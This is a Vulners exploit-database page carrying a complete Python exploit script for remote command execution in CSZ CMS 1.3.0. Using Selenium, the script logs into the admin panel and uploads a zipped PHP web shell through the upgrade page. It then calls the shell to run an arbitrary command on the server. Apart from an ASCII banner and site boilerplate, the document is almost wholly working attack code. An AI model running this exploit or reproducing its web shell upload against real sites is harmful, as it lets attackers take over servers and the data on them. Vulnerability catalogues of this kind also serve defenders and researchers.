Vulners
Lucene search
CSZ CMS 1.3.0 Remote Command Execution Exploit
# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution
# Date: 17/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download
# Version: Version 1.3.0
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS
import os
import zipfile
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options as FirefoxOptions
from selenium.webdriver.firefox.service import Service as FirefoxService
from webdriver_manager.firefox import GeckoDriverManager
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException, TimeoutException
import requests
from time import sleep
import sys
import random
import time
import platform
import tarfile
from io import BytesIO
email = "[email protected]"
password = "password"
class colors:
OKBLUE = '\033[94m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
CBLACK = '\33[30m'
CRED = '\33[31m'
CGREEN = '\33[32m'
CYELLOW = '\33[33m'
CBLUE = '\33[34m'
CVIOLET = '\33[35m'
CBEIGE = '\33[36m'
CWHITE = '\33[37m'
color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
colors.CRED, colors.CBEIGE]
random.shuffle(color_random)
def entryy():
x = color_random[0] + """
╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮
┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃
┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯
┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃
┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃
╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯
<< CSZ CMS Version 1.3.0 RCE >>
<< CODED BY TMRSWRR >>
<< GITHUB==>capture0x >>
\n"""
for c in x:
print(c, end='')
sys.stdout.flush()
sleep(0.0045)
oo = " " * 6 + 29 * "░⣿" + "\n\n"
for c in oo:
print(colors.CGREEN + c, end='')
sys.stdout.flush()
sleep(0.0065)
tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n"
for c in tt:
print(colors.CWHITE + c, end='')
sys.stdout.flush()
sleep(0.0065)
xx = " " * 6 + 29 * "░⣿" + "\n\n"
for c in xx:
print(colors.CGREEN + c, end='')
sys.stdout.flush()
sleep(0.0065)
def check_geckodriver():
current_directory = os.path.dirname(os.path.abspath(__file__))
geckodriver_path = os.path.join(current_directory, 'geckodriver')
if not os.path.isfile(geckodriver_path):
red = "\033[91m"
reset = "\033[0m"
print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset)
user_input = input("Would you like to download it now? (yes/no): ").lower()
if user_input == 'yes':
download_geckodriver(current_directory)
else:
print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset)
sys.exit(1)
def download_geckodriver(directory):
print("[*] Detecting OS and architecture...")
os_name = platform.system().lower()
arch, _ = platform.architecture()
if os_name == "linux":
os_name = "linux"
arch = "64" if arch == "64bit" else "32"
elif os_name == "darwin":
os_name = "macos"
arch = "aarch64" if platform.processor() == "arm" else ""
elif os_name == "windows":
os_name = "win"
arch = "64" if arch == "64bit" else "32"
else:
print("[!] Unsupported operating system.")
sys.exit(1)
geckodriver_version = "v0.33.0"
geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}"
ext = "zip" if os_name == "win" else "tar.gz"
url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}"
print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...")
response = requests.get(url, stream=True)
if response.status_code == 200:
print("[*] Extracting GeckoDriver...")
if ext == "tar.gz":
with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar:
tar.extractall(path=directory)
else:
with zipfile.ZipFile(BytesIO(response.content)) as zip_ref:
zip_ref.extractall(directory)
print("[+] GeckoDriver downloaded and extracted successfully.")
else:
print("[!] Failed to download GeckoDriver.")
sys.exit(1)
def create_zip_file(php_filename, zip_filename, php_code):
try:
with open(php_filename, 'w') as file:
file.write(php_code)
with zipfile.ZipFile(zip_filename, 'w') as zipf:
zipf.write(php_filename)
print("[+] Zip file created successfully.")
os.remove(php_filename)
return zip_filename
except Exception as e:
print(f"[!] Error creating zip file: {e}")
sys.exit(1)
def main(base_url, command):
if not base_url.endswith('/'):
base_url += '/'
zip_filename = None
check_geckodriver()
try:
firefox_options = FirefoxOptions()
firefox_options.add_argument("--headless")
script_directory = os.path.dirname(os.path.abspath(__file__))
geckodriver_path = os.path.join(script_directory, 'geckodriver')
service = FirefoxService(executable_path=geckodriver_path)
driver = webdriver.Firefox(service=service, options=firefox_options)
print("[*] Exploit initiated.")
# Login
driver.get(base_url + "admin/login")
print("[*] Accessing login page...")
driver.find_element(By.NAME, "email").send_keys(f"{email}")
driver.find_element(By.NAME, "password").send_keys(f"{password}")
driver.find_element(By.ID, "login_submit").click()
print("[*] Credentials submitted...")
try:
error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]")
if error_message.is_displayed():
print("[!] Login failed: Invalid credentials.")
driver.quit()
sys.exit(1)
except NoSuchElementException:
print("[+] Login successful.")
# File creation
print("[*] Preparing exploit files...")
php_code = f"<?php echo system('{command}'); ?>"
zip_filename = create_zip_file("exploit.php", "payload.zip", php_code)
driver.get(base_url + "admin/upgrade")
print("[*] Uploading exploit payload...")
file_input = driver.find_element(By.ID, "file_upload")
file_input.send_keys(os.path.join(os.getcwd(), zip_filename))
# Uploading
driver.find_element(By.ID, "submit").click()
WebDriverWait(driver, 10).until(EC.alert_is_present())
alert = driver.switch_to.alert
alert.accept()
# Exploit result
exploit_url = base_url + "exploit.php"
response = requests.get(exploit_url)
print(f"[+] Exploit response:\n\n{response.text}")
except Exception as e:
print(f"[!] Error: {e}")
finally:
driver.quit()
if zip_filename and os.path.exists(zip_filename):
os.remove(zip_filename)
if __name__ == "__main__":
entryy()
if len(sys.argv) < 3:
print("Usage: python script.py [BASE_URL] [COMMAND]")
else:
main(sys.argv[1], sys.argv[2])
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Nov 2023 00:00Current
7.4High risk
Vulners AI Score7.4